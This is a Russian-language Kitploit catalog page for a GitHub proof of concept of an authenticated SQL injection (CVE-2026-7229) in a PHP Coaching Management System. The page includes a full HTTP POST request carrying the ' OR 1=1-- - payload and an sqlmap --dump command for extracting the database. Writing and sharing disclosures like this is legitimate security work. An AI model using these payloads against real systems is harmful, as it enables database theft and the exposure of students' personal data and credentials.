Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-7229-SQLI — Доказательство концепции аутентифицированной SQL-инъекции в Coaching Management System, демонстрирующее дамп базы данных через несанитизированный параметр complaintreply. | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-7229-sqli
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеБезопасность Баз Данных
GitHubxmyronn/cve-2026-7229-sqli

CVE-2026-7229-SQLI

Доказательство концепции аутентифицированной SQL-инъекции в Coaching Management System, демонстрирующее дамп базы данных через несанитизированный параметр complaintreply.

Репозиторий
45 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Аутентифицированная SQL-инъекция в Coaching Management System позволяет выгрузить базу данных

Описание

В Coaching Management System на PHP существует уязвимость SQL-инъекции. Параметр complaintreply в функциональности ответа администратора не проходит должную санитизацию перед использованием в SQL-запросах. Аутентифицированный злоумышленник (администратор) может внедрить вредоносные SQL-запросы, что приведёт к полному извлечению базы данных.


Детали уязвимости

  • Тип: SQL-инъекция (CWE-89: Некорректная нейтрализация специальных элементов, используемых в SQL-команде)
  • Воздействие: Выгрузка базы данных / Раскрытие учётных данных
  • Затронутый файл: /cims/modules/admin/reply.php
  • Затронутый параметр: complaintreply
  • Вектор атаки: Удалённый, аутентифицированный (администратор)
  • База данных: MySQL (MariaDB)

Поставщик

code-projects.org


Продукт

Coaching Management System на PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/


Версия

Неизвестна (протестировано на последней доступной версии по состоянию на апрель 2026 года)


Подтверждение концепции (кратко)

  1. Студент отправляет жалобу Screenshot 2026-04-10 225755

  2. Администратор открывает жалобу и получает доступ к функции ответа

POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded

complaintreply=' OR 1=1-- -&submit=submit

Screenshot 2026-04-10 225808
  1. Перехват запроса через Burp Suite Screenshot 2026-04-10 225821

  2. Внедрение полезной нагрузки:

    root@kitploit:~
    '
    
Screenshot 2026-04-10 225844
root@kitploit:~
Наблюдается SQL-ошибка

7. Подтверждение инъекции:

root@kitploit:~
' OR 1=1-- -
Screenshot 2026-04-10 225900
  1. Выгрузка базы данных с помощью:

    root@kitploit:~
    sqlmap -r sqli.txt --dump
    
Screenshot 2026-04-10 235219

Инъекция подтверждена с помощью ошибок, логических условий и автоматизированной эксплуатации через sqlmap

Воздействие

  • Возможно полное извлечение базы данных
  • Раскрытие учётных данных, хранящихся в открытом виде
  • Полная компрометация данных приложения
  • Обход аутентификации и повышение привилегий через извлечение учётных данных
  • Полная выгрузка базы данных, включая таблицу пользователей (учётные данные), персональные данные студентов, записи преподавателей и историю жалоб.

Серьёзность: КРИТИЧЕСКАЯ

Скачать инструмент